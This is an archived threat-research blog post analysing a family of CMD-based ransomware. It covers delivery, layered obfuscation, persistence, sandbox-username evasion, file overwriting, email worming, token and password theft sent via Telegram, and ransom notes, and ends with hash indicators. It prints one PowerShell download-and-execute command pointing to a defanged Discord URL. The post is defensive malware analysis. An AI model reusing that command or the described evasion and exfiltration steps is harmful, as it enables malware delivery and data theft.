YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation Published: 2022-06-02 · Archived: 2026-04-05 19:24:54 UTC The earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This variant possessed the ability to overwrite its victim's files — however, this was limited to the current directory in which the ransomware was being executed. Upon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in the compromised network notifying them of the infiltration. Along with this, another message was sent stating that "Kekware and Kekpop were just the begining" — indicating that the author was preparing a more sophisticated variant of the original ransomware. Table 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal. Date earliest sample was uploaded to VirusTotal Ransomware sample 07 Apr 2022  GonnaCope 07 May 2022 Kekpop 11 May 2022  Kekware  13 May 2022  YourCyanide Table 1. CMD-based ransomware samples and their date of upload to VirusTotal YourCyanide technical analysis It initially arrives as an LNK file that contains the following PowerShell script for downloading the "YourCyanide.exe" 64- bit executable from Discord and executing it: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')"; start YourCyanide.exe" This 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd. The dropped YourCyanide.cmd file contains a script downloaded from Pastebin that is saved using the same filename (YourCyanide.cmd). The ransomware will create a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce for cleanup purposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader from the machine. The downloaded script file contains 10 layers of obfuscated code, with each layer being needed to deobfuscate the succeeding layer. It takes advantage of the Enable Extensions and Enable Delayed Extensions commands, causing variables within a batch file to be expanded at execution time rather than at parse time. The malware uses following format for its obfuscation technique: %parameter:~index of character, number of characters to take% %Kesik:~19,1%, will return 1 character from the index value 19 of parameter Kesik Upon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximized Command Prompt windows. It will then try to add a user "session" to the Administrators group using the net localgroup command. https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 1 of 9 It also creates an autostart mechanism for persistence by creating a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and then copying itself to the Startup directory. It also disables Task Manager by modifying its registry entry. It then checks if %SystemDrive%\AutoExec.bat exists, and if so, it deletes the original and then copies itself and sets the file to read only, hidden, and as a system file.  It also avoids machines with the following usernames, some of which, according to our research, are usernames used by malware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded: a.monaldo  George george help karolisliucveikis  Soumy guent After checking the username of the infected machine, it drops and executes a batch file in UserProfile\Documents\black.bat. This batch file is responsible for continuously opening the Blank Screen Saver file, which renders the machine inaccessible while the malware is running. YourCyanide also terminates several services and security applications by concatenating variables to form the strings "net stop," "norton," "symantec," and "McAfee." It then swaps the mouse button using the SwapMouseButton Export function of the user32.dll file. After terminating applications, it renames files from the following directories to *.cyn and overwrites its contents to a random number using a built-in variable in CMD shell called %random%. %MyDesktop% %MyDocuments% %MyMusic% %MyPictures% %MyVideos% %Downloads%   Although no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed — especially for those with large amounts of files in these particular folders. Furthermore, since the malware is still currently under development, it’s likely that the malware authors are still finalizing the encryption portion of the routine. It then creates the following ransom notes and drops them into %MyDesktop%: YcynNote.txt other.txt It features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to win.ini and system.ini. After performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for rendering the machine inaccessible. Deleting the file will stop the blank screen saver file from continuously opening. YourCyanide is also capable of spreading via email and to different drives. It creates two VBScript files, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment): I Have a crush on you Check This Out It then copies itself to the following drives or directories: D: E: F: G: H: %UserProfile% YourCyanide enables Remote Desktop Connection (RDP) by using the netsh commands shown in Figure 18. https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 2 of 9 The ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections via the netsh advfirewall function. It then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp. The ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine. Like the main file, it also features multiple layers of obfuscation. Upon execution, the file hides itself and creates its autostart mechanism by producing a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by copying itself to the Startup directory. The malware uses the Telegram chatbot API to exfiltrate the stolen information and sets it to variable "Webhook" It downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt, which contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge. It also collects the following machine information and stores it in userdata.txt: IP addresses MAC addresses CPU Information Memory Size Partition information System specifications OS product key Currently running processes Both Tokens.txt and userdata.txt will then be sent via Telegram chatbot API using the curl command. We also discovered that YourCyanide exfiltrates Minecraft-related credentials. Finally, it downloads another executable from Google Docs and executes it using the parameter "/stext ForME.txt". ForMe.txt will then be sent to the Telegram chatbot. While the Google Docs link is currently inaccessible, and therefore a sample can't be sourced, we noticed that it is run using the same parameter as the sample "passwords.exe," which is also used by the earlier Kekpop variant. The parameter "/stext" is employed when executing the file, which is similar to the WebBrowserPassView application used to retrieve credentials stored by various web browsers such as Internet Explorer (Version 4.0 - 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera. The file created from executing passwords.exe contains saved passwords that are stored in Google Chrome. Avoiding usernames Of the usernames this malware avoids, three in particular stand out. Namely: a.monaldo, karolisliucveikis, and soumy. Upon further research, we discovered that these are usernames   from sandbox environments. The username of the sandbox machine used by Hunter Yomi Variant Comparison The team analyzed these CMD-based ransomwares and came up with the following table that compares each variant and their differences. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web browsers and list of applications, and does not enable RDP connections. Furthermore, it does not execute black.bat, the file that temporarily causes the machine to become inaccessible while the malware executes its payload. We also observed that the BTC address used by GonnaCope is different from the BTC address of the succeeding variants and it contains a different ransom note format. The variants also differ in their delivery —  shifting between arriving as an archive, executable files, or LNK files that drop the CMD-based ransomware. The payloads are also located in different parts of the chain, with some being found in the main CMD file, while others are found in files that are downloaded from Pastebin and Discord. Behavior GonnaCope Kekware Kekpop Creates auto-start mechanism Yes Yes Yes Disables task manager Yes Yes Yes https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 3 of 9 Checks the username of the machine No Yes Yes Creates and executes black.bat to continuously turn on Blank Screen Saver No Yes Yes Stops services Yes Yes Yes Terminates applications Yes Yes Yes Swaps mouse buttons Yes Yes Yes Renames files GonnaCope.cope random.cope ...cyn ..kekpop Gathers a list of installed applications No Yes Yes Collects machine information Yes Yes Yes Collects token access data Yes Yes Yes Collects passwords saved in web browsers No Yes Yes Sends an email with a copy of itself as an attachment Yes Yes Yes Subject of sent email Is this you? Here is that document you needed I Have a crush on you Check This Out I Have a crush on you Copies itself in drives Yes Yes Yes Enables RDP connection No Yes Yes Ransom note message Your files are unusable pay $100 in bitcoin to bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll to get your files back or allow it into outlook for a decryption key Q: What happened to my files A: They got encrypted by kekware. Q: how can i get them back A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happened to A: They got encrypted Q: how can i get them A: You can get them b bitcoin to this btc wal bc1qrl532s9r2qge8d8 https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 4 of 9 Q: What happens if i dont pay A: You will never get your files back. Q: What happens if i A: You will never get Q: Is this related to kp A: No fuck kpop Other messages     kekpop is on your net BTC wallet used bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf bc1qrl532s9r2qge8d8 Conclusion The continued use of heavily obfuscated script results in very low detections for these CMD-based ransomware, making it easier to compromise their victims’ machines. Even if the technique is not new, the use of multilayer custom environment variables for obfuscation is highly effective in avoiding detection. These ransomware variants are also capable of downloading multiple payloads, performing lateral movement via emails, and using Discord, Pastebin and even Microsoft document links. From our analysis, we are able to infer that the malware author is actively monitoring the reports created by malware researchers by taking note of the usernames found in their sandbox logs and reports, and including them in the evasion list of usernames and machines that is part of the initialization process of the malware being used.  Ransomware variants that possess multiple capabilities — such as the one analyzed in this blog entry — are gaining popularity. While YourCyanide and its other variants are currently not as impactful as other familiesnews article, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework. It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage. Trend Micro solutions A multilayered approach can help organizations defend against ransomware attacks using security technologies that can detect malicious components and suspicious behavior. Trend Micro Vision One™products provides multilayered protection and behavior detection, which helps block suspicious behavior and tools before the ransomware can do any damage. Trend Micro Cloud One™ Workload Securityproducts protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning. Trend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware. Trend Micro Apex One™products offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection. Indicators of Compromise GONNACOPE     File SHA256 Detection GonnaCope.Bat ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968 Trojan.BAT.GONNACOPE.A GonnaCope.Bat 0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122 Trojan.BAT.GONNACOPE.THEOEBB GonnaCopeDL f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3 Trojan.MSIL.GONNACOPE.A https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 5 of 9 GonnaCopeCryptor 2987b5cacc9de6c3a477bd1fc21b960db3ea8742e3b46906d134aa8b73f17280 Ransom.MSIL.GONNACOPE.YXCEE GonnaCope 7388722c3a19854c1ccf19a92798a7cef0efae538e8e8ecf5e79620e6a49cea7 TrojanSpy.MSIL.GONNACOPE.A GonnaCopeRansNote 7edb2d152d8744343222b1b93ff846616fc3ca702e96c7e7a3663d2d938d8374 Ransom.MSIL.GONNACOPE.A.note mail.vbs 26bde18048c32f6612d8d76b8696b2ce59db227913dccd51f696b51640ee11e9 Worm.VBS.GONNACOPE.A msg.vbs ca84abd94b65d69ee8d26ffc3cc63a5a0886136e63d405ac293fefecc1d2ff3a PUA.VBS.GonnaLoop.A msgbox.vbs d12e08e5dd94021dfa59d36d3adfe7f47df180023a04be781fa7695adc5ccc54 PUA.VBS.GonnaLoop.A nokeyboard.reg a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e PUA.Win32.Disabler.A Readme.txt 9c39b7535b527df3b70800562bad98dc2e046de321fe3914dab896eda753cf38 Ransom.Win32.GONNACOPE.YXCEW.no downloader.vbs 45189864b6ff6d844d27b59123d2cd461f539d42b362e60e49da50119f0b7083 Trojan.VBS.GONNACOPE.A       KEKPOP     File SHA256 Detection Arrival c8d6298f5ef09a324bb6afc7bb4550857fbd0fcbaea2b315b4f00d78bcc6a262  Trojan.BAT.KEKPOP.THEACBB 296ba1469d072c37c6361fe80ba396a92f6461b9562103a3b5a20841d0757722 Main File  bfd9336deeb399f412c51f8f6797e6b5dc81afa1f1638ab937a28df733a78c0f Ransom.BAT.KEKPOP.THEAABB f8a0d9ea41c2b9082f9aebbc7e337b22d1092dd307ccd34d71fdbd56fd94a41d 1e791e8511ac29bf4fd2a289ed35bb24151a7b0bfa3ab9854b2a586ede050a54 d2d25dee61b17133415b4856412f20134823177effccd53a1f14677d372a4b56 Dropped BAT File 1 Trojan.BAT.KEKPOP.THEACBB Dropped BAT File 2 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB Dropped BAT File 3 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB Dropped Text File Ransom.BAT.KEKPOP.THEACBB.note Dropped HTML File Ransom.HTML.KEKPOP.THEACBB.note https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 6 of 9 Passwords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM GetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES kekpopdicord.exe e5f589027e859e8bedb2d5fbecff37dcf7bcf7e4af6671c1c0c9aac9b6712913 Trojan.Win64.KEKPOP.YXCET Trojan.BAT.KEKPOP.YXCEZ       KEKWARE     File SHA256 Detection Arrival 3262ece43e7135c9ed6788588bae269ed75db800964d48cfb762542e0d003259 Trojan.PS1.KEKPOP.YXCEST 23269070507a70c34a4e219f9be19943211ed38eec4a9ce2b3a49bf76676a5e3 Trojan.PS1.KEKPOP.YXCEST Main File  e0946a55e9cbdb3485f154f72994bad765b74ba280a2149485af113503b7dc78 Trojan.BAT.KEKPOP.YXCEST YcynNote.txt 602533e3c67a248e4dc152fa266a372dd2b2d82ff68fdc17c1591ecc429147bc Ransom.BAT.KEKPOP.YXCEST.note rAndom.cmd 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB cynlog.cmd 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB Passwords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM GetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES black.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST loveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST mail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST fasdgfsdga.cmd 56622656231060b6401dcea515953d517fd9212b8de66c33c4847840aa958c83 Trojan.BAT.POWLOAD.TIAOELC       YOURCYANIDE     File SHA256 Detection LNK 31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad Trojan.LNK.KEKPOP.YXCEST https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 7 of 9 9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe Trojan.LNK.KEKPOP.YXCERT c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50 Trojan.LNK.KEKPOP.YXCERT f9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649 Trojan.LNK.KEKPOP.YXCERT Win64 EXE Dropper 8249d6e886a97aec60d35d360773e76c6630d822817dabe1c7674a0b51965669 Trojan.Win64.KEKPOP.YXCEST d51538d8da12af8ae36f95b645e76218e4fd61ab433504a3900c14942160446c Trojan.Win64.KEKPOP.YXCERT 6a645f72acf1d6c906e8c844e4e8b3fc92c411bf69937cfe7069df2cc51b8a4e Trojan.Win64.KEKPOP.YXCERT 2f2fac2c91268a9b31401633b63a374242e46919dc21106466c6c05bab3ce3f8 Trojan.Win64.KEKPOP.YXCERT a180c31666788fb6a7da421a743bb1c487099297ec06f2bdd841f342021f3763 Trojan.Win64.KEKPOP.YXCERT Downloader of the payload b43d1af1abeef8b552f0b362b2162c3a940a843f5474518c665e145b3aa01ace Trojan.PS1.KEKPOP.YXCEST 6e33a2c56b7b32be8e99a15920cf179b4e7aa62eaef8496ace67261543569c25 Trojan.LNK.KEKPOP.YXCERT Main File (YourCyanide.cmd) 6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91 Trojan.BAT.KEKPOP.AB f8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323 Ransom.BAT.KEKPOP.YXCERT 8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402 Ransom.BAT.KEKPOP.YXCERT 67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf Ransom.BAT.KEKPOP.YXCERT a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c Ransom.BAT.KEKPOP.YXCERT 0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2 Ransom.BAT.KEKPOP.YXCERT black.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST ycynlog.cmd 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c TrojanSpy.BAT.KEKPOP.YXCEST YcynNote.txt 4e455d4b353c7cce0155ce1050afc30d064fd93c57bc6428eb3cd988ecd855f0 Ransom.BAT.KEKPOP.YXCERT.note other.txt a4c3412ac96061561c6cf05a259dd14e5151fe66eee115ff154d6a0366ba1a12 N/A - non-malicious component loveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST mail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 8 of 9 GetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES ForMe.exe N/A 316403043e4135474637c0e3f958e72015a08242dc2712f7635012e253cb81b2 Trojan.LNK.KEKPOP.YXCEST 6a95f52d228316f9b48618a1c728e1c47ec71843e5b4cfb76ab3ef86dcd8cf8c Trojan.LNK.KEKPOP.YXCEST Read_Me.txt.cmd 77fd8fba88236d5f55bbb12dbaaa69ee7673397d8606c0c67b22ce523af818cd Trojan.BAT.POWLOAD.TIAOELB Main File (WinBugsFix.cmd) 40b923db9c5da6b3bfe345139c42a71e2fd124de6a2808f8cec2a979a044f191 Ransom.BAT.KEKPOP.YXCEST b0f7c2021c00a1d495f408295d161befa3faceab02d9c4047cee4904db6c1272 Ransom.BAT.KEKPOP.YXCEST Source: https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html Page 9 of 9